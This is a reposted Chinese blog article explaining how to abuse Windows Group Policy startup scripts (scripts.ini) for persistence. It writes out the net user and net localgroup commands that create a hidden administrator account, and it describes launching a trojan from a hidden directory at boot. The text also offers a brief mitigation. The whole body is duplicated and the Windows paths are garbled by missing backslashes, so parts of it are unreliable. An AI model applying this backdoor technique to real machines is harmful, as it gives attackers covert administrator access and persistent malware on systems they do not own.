換個角度 開啟後門的另一個思路(轉)
換個角度 開啟後門的另一個思路(轉)[@more@] 1、組策略啟動指令碼
利用過程:啟動組策略(執行->gpedit.msc->計算機配置->Windows 設定->指令碼(啟動/關機) )
2、啟動與關機相關設定
選擇啟動->屬性->新增,會彈出選擇指令碼名。選擇程式 C:windowssystem32 et.exe,引數 user admin /add 來執行 net user admin /add。再同樣新增C:Windowssystem32 et.exe localgroup administrators admin /add來執行 net localgroup administrators admin /add。
費話少說: 再經過進一步瞭解的時候發現這裡是由C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini(PS:預設是隱藏的。)來控制 shutdown 和 Startup 的。
ini組成方式如下:
[Startup]
0CmdLine=C:WINDOWSsystem32 et.exe
0Parameters=user admin /add
1CmdLine=C:WINDOWSsystem32 et.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] 代表是啟動
0CmdLine=C:WINDOWSsystem32 et.exe 指令碼名
0Parameters=user admin /add 指令碼引數
1CmdLine=C:WINDOWSsystem32 et.exe 第二條指令碼名
1Parameters=localgroup administrators admin /add 第二條指令碼引數
[Shutdown] 關閉
0CmdLine=1.bat 指令碼名 1.bat 目錄隊應於
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup
0Parameters= 引數
也就是說 scripts.ini 控制著整個啟動,就如同以前 win.ini 一樣。
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup 啟動檔案的目錄,那樣指令碼名路徑就可以不用加詳細目錄名了。
C:WINDOWSsystem32GroupPolicyMachineScriptsshutdown 關閉檔案目錄,同上。
思路就這樣,copy 後門到非常隱藏的目錄,再加個啟動指令碼引數,實現木馬啟動。
解決此缺陷的方法:組策略->計算機配置->管理模板->系統->指令碼,相應的禁止就行了。
或者來招毒的,徹底禁止掉這個:把scripts.ini 對應使用者許可權全部刪除,system administrators 全部取消,就沒人能訪問了。
以上在 Windows XP SP2 均已測試成功。
利用過程:啟動組策略(執行->gpedit.msc->計算機配置->Windows 設定->指令碼(啟動/關機) )
2、啟動與關機相關設定
選擇啟動->屬性->新增,會彈出選擇指令碼名。選擇程式 C:windowssystem32 et.exe,引數 user admin /add 來執行 net user admin /add。再同樣新增C:Windowssystem32 et.exe localgroup administrators admin /add來執行 net localgroup administrators admin /add。
費話少說: 再經過進一步瞭解的時候發現這裡是由C:WINDOWSsystem32GroupPolicyMachineScriptsscripts.ini(PS:預設是隱藏的。)來控制 shutdown 和 Startup 的。
ini組成方式如下:
[Startup]
0CmdLine=C:WINDOWSsystem32 et.exe
0Parameters=user admin /add
1CmdLine=C:WINDOWSsystem32 et.exe
1Parameters=localgroup administrators admin /add
[Shutdown]
0CmdLine=1.bat
0Parameters=
[startup] 代表是啟動
0CmdLine=C:WINDOWSsystem32 et.exe 指令碼名
0Parameters=user admin /add 指令碼引數
1CmdLine=C:WINDOWSsystem32 et.exe 第二條指令碼名
1Parameters=localgroup administrators admin /add 第二條指令碼引數
[Shutdown] 關閉
0CmdLine=1.bat 指令碼名 1.bat 目錄隊應於
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup
0Parameters= 引數
也就是說 scripts.ini 控制著整個啟動,就如同以前 win.ini 一樣。
C:WINDOWSsystem32GroupPolicyMachineScriptsStartup 啟動檔案的目錄,那樣指令碼名路徑就可以不用加詳細目錄名了。
C:WINDOWSsystem32GroupPolicyMachineScriptsshutdown 關閉檔案目錄,同上。
思路就這樣,copy 後門到非常隱藏的目錄,再加個啟動指令碼引數,實現木馬啟動。
解決此缺陷的方法:組策略->計算機配置->管理模板->系統->指令碼,相應的禁止就行了。
或者來招毒的,徹底禁止掉這個:把scripts.ini 對應使用者許可權全部刪除,system administrators 全部取消,就沒人能訪問了。
以上在 Windows XP SP2 均已測試成功。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617542/viewspace-962825/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 換個角度看GAN:另一種損失函式函式
- 換個角度看原型鏈原型
- 換個思路理解Javascript中的thisJavaScript
- 換個角度,重新理解架構架構
- 換個角度使用VUE過濾器Vue過濾器
- 換個角度理解Android的AIDL原理AndroidAI
- 轉換思路,開拓創新
- 換個角度提升APP效能和質量APP
- Rust中如何將本地時間轉換為另一個時區?Rust
- Flutter Scheme 使用(瀏覽器開啟App,App內開啟另一個App)FlutterScheme瀏覽器APP
- 一個快速切換一個底層實現的思路分享
- 分享的山 換個地圖開啟成了海地圖
- 開發內容分解的9個角度
- Winform開發--資料從一個DataGridView轉移到另一個DataGridViewORMView
- 轉一個白老大的文章--- 一個診斷的思路
- 用opencv測量物體大概角度的一個比較笨的思路OpenCV
- 擊後開啟某個分類的商品列表
- 從另一個思路來學習安卓事件分發機制安卓事件
- 角度和弧度之間的轉換
- 換個角度就很好深入理解的js繼承JS繼承
- 【詳解】換一個角度看Socket的資料讀寫
- 資料分析不好做?這個流程教你開啟新思路
- 帶你換個角度理解圖卷積網路卷積
- 換個角度,智慧硬體也能這樣玩
- 另一個角度來重新瞭解圖靈、數學以及計算機圖靈計算機
- 換一個角度,看華為雲的變化,雲產業的更迭產業
- 用PHP換個思路讀取WORD內容PHP
- 行列轉換的一個例子
- 七牛資料從一個桶轉移到另一個桶
- 換個角度學習ASP.NET Core中介軟體ASP.NET
- Service使用referred和avileable固定會話到一個節點,當機後會切換到另一個節點會話
- 一個後端開發的 Vue 筆記【入門級】後端Vue筆記
- 換個角度聊聊「Web3+AI」:這個未來需要多久才來?WebAI
- github從一個倉庫切換到另一倉庫Github
- 換個角度帶你學C語言的基本資料型別C語言資料型別
- CI Weekly #16 | 從另一個角度看開發效率:flow.ci 資料統計功能上線
- 網頁開啟自動跳轉另一個網頁怎麼辦、網頁劫持怎麼解決網頁
- 一個不易發現的PHP後門 --PHP